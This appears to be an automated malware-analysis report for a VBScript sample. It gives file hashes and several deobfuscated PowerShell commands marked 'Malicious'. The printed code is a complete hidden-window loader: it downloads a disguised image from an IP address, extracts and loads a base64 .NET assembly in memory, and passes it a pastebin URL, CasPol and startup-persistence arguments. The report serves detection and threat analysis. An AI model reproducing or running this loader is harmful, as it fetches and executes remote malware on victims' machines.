|
Hash | Hash Value |
|---|---|
| MD5 | d004101a2a747c086835148e400462f7
|
| Sha1 | a7f445c5b9ecf11234474e74b623351d052f8596
|
| Sha256 | 5728fe1fbdd76d4b0ddb5e3cacb1aab8ccdaa03e6b53d497255eb24926f0ea67
|
| Sha384 | 2a5156b18b58a235ea15600b773badfaa14f0fbb01859cbf04b379fd8df0c814657db2e4d0e51b814697c9f6dedab6d0
|
| Sha512 | 3a26baaa449b6938abcc0648abfd079b6f5b24cedbd1ae35d52fb03bb6e45b497779726a6a400b2c288889a5576d90201500ea0a42cf946c0352cf09e895084c
|
| SSDeep | 384:duMBjmqhD09v1TBkg44BS9kWIkeLdIoenFm9H4XLSnRHvtCFinZeC7T9r7n:o6aqhD09v1TBR/AYLvDH+LhwZeC7T5n
|
| TLSH | C0C2C767FF0963788B02674A9E0D12299D6412A31A339978FF3DC56F0F2743597B4E88
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
d004101a2a747c086835148e400462f7 |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" Malicious |
d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious |
d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious |
d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" Malicious |
d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |